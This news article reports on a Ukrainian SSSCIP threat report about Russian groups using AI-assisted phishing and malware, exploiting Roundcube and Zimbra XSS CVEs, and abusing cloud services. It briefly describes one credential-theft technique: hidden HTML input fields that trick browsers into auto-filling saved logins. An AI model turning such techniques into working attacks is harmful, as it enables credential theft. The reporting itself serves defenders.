Russian hackers have taken their cyber offensive to a new level by integrating artificial intelligence (AI) into cyber attacks against Ukraine, according to a report published by the State Service for Special Communications and Information Protection of Ukraine (SSSCIP).
The report revealed that during the first half of 2025 (H1 2025), hackers began using AI not only to craft sophisticated phishing emails but also to develop new strains of malware.
“Some malware samples analyzed by our experts clearly show signs of being AI-generated, and it’s evident that cyber attackers are not planning to stop here,” said SSSCIP in its report released on Wednesday.
Rising Number of Cyber Incidents
According to SSSCIP, Ukraine recorded 3,018 cyber incidents in H1 2025, an increase from 2,575 attacks documented in the second half of 2024 (H2 2024). While attacks on local governments and military entities surged, those aimed at national government institutions and energy companies slightly declined.
AI-Driven Malware Campaigns
One of the most notable attacks involved the hacking group UAC-0219, which deployed a malware known as WRECKSTEEL against state administration bodies and critical infrastructure. Investigators believe the PowerShell-based data-stealing malware was built using AI development tools.
Other major phishing operations identified during the same period include:
- UAC-0218: Launched phishing campaigns targeting defense forces, delivering HOMESTEEL via infected RAR archives.
- UAC-0226: Focused on defense technology developers, local administrations, military units, and law enforcement, spreading GIFTEDCROOK stealer.
- UAC-0227: Targeted local authorities and infrastructure entities, using ClickFix-style phishing and malicious SVG files to deliver Amatera Stealer and Strela Stealer.
- UAC-0125 (linked to Sandworm): Masqueraded as ESET by sending emails that redirected users to a fake security website delivering a C#-based backdoor named Kalambur (aka SUMBUR) disguised as a threat removal utility.
Exploiting Zero-Day Vulnerabilities
SSSCIP also confirmed that APT28 (UAC-0001), a well-known Russian threat group, exploited cross-site scripting (XSS) vulnerabilities in Roundcube and Zimbra webmail software. These attacks took advantage of CVE-2023-43770, CVE-2024-37383, CVE-2025-49113 (Roundcube) and CVE-2024-27443, CVE-2025-27915 (Zimbra).
The attackers injected malicious code through APIs to gain unauthorized access to user credentials, contact lists, and email filters, automatically forwarding messages to their own mailboxes.
In some cases, hackers created hidden HTML input fields with the attribute autocomplete=”on”, tricking browsers into auto-filling saved login data, which was then stolen.
Hybrid Warfare Strategy
The report emphasized that Russia continues to execute hybrid warfare, combining cyber operations with physical assaults on the battlefield. The notorious Sandworm group (UAC-0002) remains active, primarily targeting Ukraine’s energy, defense, ISP, and research sectors.
Use of Legitimate Services in Cyber Operations
Another concerning trend is the abuse of legitimate online services by Russian threat actors. Platforms such as Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, and mocky.io are being repurposed to host malware, phishing pages, and exfiltrate stolen data.
“The use of legitimate services for malicious activity isn’t new,” said SSSCIP. “However, the number of platforms exploited by Russian hackers has grown significantly in recent months.”
